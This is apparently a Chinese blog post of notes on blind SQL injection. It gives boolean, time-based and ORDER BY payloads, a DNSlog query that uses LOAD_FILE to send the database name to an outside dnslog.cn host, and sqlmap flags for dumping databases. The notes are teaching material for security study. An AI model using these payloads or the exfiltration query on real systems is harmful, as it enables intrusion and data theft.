盲注(浅显易懂!)

分类

1. 布尔盲注
2. 时间盲注
3. 排序注入(也算是盲注)

什么时候用盲注

结果只有两种页面 一个 true 一个 false 页面

原理

IF(表达式,TRUE, FALSE)
length(字符串) #获取字符串长度
substr(要截取的字符串 ,从哪里开始截取 ,截取的长度) ASCII(字符)  #转为ascii码

select * from users where user_id = 0 or if( substr(database(),1,1) = 'd ' ,1,0)

select * from users where user_id = '1 '/if(0,1,0)

时间盲注

sleep(10)*延时10s    

什么时候用时间盲注

只有一种页面回显的时候!

排序注入

只能做时间盲注!

他是一个‘排序‘ 你得有数据!
数据不能只有一条!


select * from users  order by user desc,if(1,sleep(10),0)

Dnslog

反链平台

LOAD_FILE() #读取某个文件

前提条件:
secure_file_priv=


select
LOAD_FILE(concat("",database(),".4z1hib.dnslog.cn /s"))

sqlmap

-h 帮助
—u 选择url
—batch 使用默认配置 —dbs 获取库名
-D 选择数据库
—tables 获取表名 -T 选择表名
—columns 获取字段名 -C 选择字段
—dump 输出数据 —dump-all

-r 读取数据包
-p 选择注入的参数

-proxy  代理
—random-agent  随机使用一个请求头

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

アイシン

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值